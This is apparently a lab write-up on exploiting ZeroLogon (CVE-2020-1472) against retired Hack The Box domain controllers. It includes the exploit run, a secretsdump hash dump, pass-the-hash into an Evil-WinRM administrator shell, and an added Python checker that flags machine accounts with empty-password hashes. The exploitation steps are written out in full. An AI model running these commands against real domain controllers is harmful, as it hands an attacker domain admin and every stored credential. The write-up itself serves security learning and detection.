
CVE-2020-1472 was patched in August 2020 by Microsoft, but it didn’t really make a splash until the last week, when proof-of-concept exploits started hitting GitHub. It truly is a short path to domain admin. I’ll look at the exploit and own some machines from HTB with it.

Background

CVE-2020-1472, or ZeroLogon, abuses a bug in a customized authentication scheme used by the Netlogon Remote Protocol. Secura put out a whitepaper about the vulnerability that goes into all the details of what is broken. The gist is that the authentication protocol insecurely uses AES-CFB8, which allows the attacker to spoof the client credential, disable signing and sealing, and spoof a call to the RPC function that is responsible for letting a computer update its own password, though only to an empty password.

Once the attacker knows the machine account password for a domain controller, they are able to dump all the hashes from that computer, after which it is trivial to use the administrator hash to get a session. This means that any attacker with network access to an unpatched domain controller can become domain admin.

This exploit will change the machine password of the target domain controller to the empty string. This will break things. Do not use these outside a CTF / lab environment without fully testing and understanding the risks, and measuring them against your tolerance. Many of the POCs come with scripts to restore the machine password after the attack, which can help restore the machine (but again, you’ll want to test and get comfortable with those).

Setup

POC

There are a bunch of POCs out there. I ended up playing with this one. I just went into /opt on my local machine and ran git clone https://github.com/dirkjanm/CVE-2020-1472.git to get a copy.

Impacket

Impacket is a collection of Python classes that work with network protocols, and it is especially good at Windows protocols. All of the POCs I found use Impacket to handle the Windows-specific protocols. Unfortunately, the POCs all need the latest version of Impacket, which isn’t what is available through the package managers yet. And, you can really dork your computer (or VM) by installing Python tools in multiple ways.

To get around this, I installed a copy of Impacket into a Python virtual environment. I cloned a copy with git clone https://github.com/SecureAuthCorp/impacket.git. Then, cd impacket, and I’ll create a virtual environment with python3 -m venv venv. Now activate it, and see that the prompt changes:

root@kali:/opt/impacket# source venv/bin/activate
(venv) root@kali:/opt/impacket#

Now pip install . will install Impacket. As long as I’m running with the virtual env activated, it will all work nicely together. To deactivate the virtual environment, I’ll just run deactivate.

Example - Monteverde

There are tons of boxes on HTB that are domain controllers to test on. I’ll start with Monteverde. If I try to dump the password hashes using the machine account and an empty password, it fails:

(venv) root@kali:/opt/impacket# secretsdump.py -just-dc -no-pass MONTEVERDE\$@10.10.10.172
Impacket v0.9.22.dev1+20200915.115225.78e8c8e4 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[*] Cleaning up... 

STATUS_LOGON_FAILURE calls out an invalid logon.

Now I’ll run the exploit:

(venv) root@kali:/opt/impacket# python /opt/CVE-2020-1472/cve-2020-1472-exploit.py MONTEVERDE 10.10.10.172
Performing authentication attempts...
===========================================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

Now, I’ll run the same secretsdump command. I’ll give it a username of the machine account (typically the hostname with a $ appended), and use the -no-pass flag:

(venv) root@kali:/opt/impacket# secretsdump.py -just-dc -no-pass MONTEVERDE\$@10.10.10.172
Impacket v0.9.22.dev1+20200915.115225.78e8c8e4 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:100a42db8caea588a626d3a9378cd7ea:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3480c0ed5001f14fa7a49fdf016043ff:::
AAD_987d7f2f57d2:1104:aad3b435b51404eeaad3b435b51404ee:599716220acac74a2d9049230d3a8b06:::
MEGABANK.LOCAL\mhope:1601:aad3b435b51404eeaad3b435b51404ee:f875f9a71efc6b0ee93dd906aedbc8b6:::
MEGABANK.LOCAL\SABatchJobs:2602:aad3b435b51404eeaad3b435b51404ee:fd980edb4732d8175a52a9b5e1520bc1:::
MEGABANK.LOCAL\svc-ata:2603:aad3b435b51404eeaad3b435b51404ee:d192ea098c69b7d26c50808a5ac75bea:::
MEGABANK.LOCAL\svc-bexec:2604:aad3b435b51404eeaad3b435b51404ee:2e4de9439cfd99f861dec8fc460c47e3:::
MEGABANK.LOCAL\svc-netapp:2605:aad3b435b51404eeaad3b435b51404ee:6bd17d9707c3da465b96cdf0e1a3a4d6:::
MEGABANK.LOCAL\dgalanos:2613:aad3b435b51404eeaad3b435b51404ee:7a695f4cc64a302d8e53da58f0885736:::
MEGABANK.LOCAL\roleary:2614:aad3b435b51404eeaad3b435b51404ee:cb3fa0132c099c5b29c30ef128e90ad8:::
MEGABANK.LOCAL\smorgan:2615:aad3b435b51404eeaad3b435b51404ee:3a2b291c4291a1063a4b32e1770e5388:::
MONTEVERDE$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...[snip]...
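Note the MONTEVERDE$ line: its NT hash is 31d6cfe0d16ae931b73c59d7e0c089c0, the hash of an empty password (the same value Guest carries). That is the footprint this exploit leaves, and it is something a defender or a post-exploitation cleanup can check for in a dump. The following is an added example, not code from the post or from the POC repository: it derives the empty-password NT hash with a small MD4 implementation (NT hash = MD4 over the UTF-16LE password) and flags machine accounts in secretsdump-style output whose hash matches. The sample rows are copied from the dump above.

```python
import struct

# Minimal MD4 (RFC 1320); hashlib's md4 is an optional legacy provider, so derive it here.
def md4(data: bytes) -> bytes:
    mask = 0xFFFFFFFF
    rotl = lambda v, n: ((v << n) | (v >> (32 - n))) & mask
    rounds = (  # (mix function, message-word order, shifts, round constant)
        (lambda x, y, z: (x & y) | (~x & z), lambda i: i, (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         lambda i: (i % 4) * 4 + i // 4, (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         lambda i: int(format(i, "04b")[::-1], 2), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, order, shifts, const in rounds:
            for i in range(16):
                a = rotl((a + fn(b, c, d) + x[order(i)] + const) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> str:
    return md4(password.encode("utf-16le")).hex()
EMPTY_NT = nt_hash("")  # 31d6cfe0d16ae931b73c59d7e0c089c0

def empty_password_machine_accounts(dump: str) -> list:
    """Machine accounts (name ends in '$') whose NT hash is the empty-password hash,
    read from secretsdump 'domain\\user:rid:lmhash:nthash:::' lines."""
    hits = []
    for line in dump.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # skip banners, '[*]' status lines and blanks
        account = parts[0].split("\\")[-1]
        if account.endswith("$") and parts[3].lower() == EMPTY_NT:
            hits.append(account)
    return hits

# Rows copied from the dump above; Guest has the empty hash but is not a machine account.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:100a42db8caea588a626d3a9378cd7ea:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
MONTEVERDE$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""
```

Running empty_password_machine_accounts(SAMPLE_DUMP) returns ['MONTEVERDE$']; the same check against a dump from a healthy domain should return an empty list, since no domain controller's machine account should ever have an empty password.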

I can use that administrator hash to get a WinRM session with Evil-WinRM:

root@kali:/opt/impacket# evil-winrm -u administrator -i 10.10.10.172 --hash '100a42db8caea588a626d3a9378cd7ea'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

I tried the same process on a handful of other retired machines, with total success.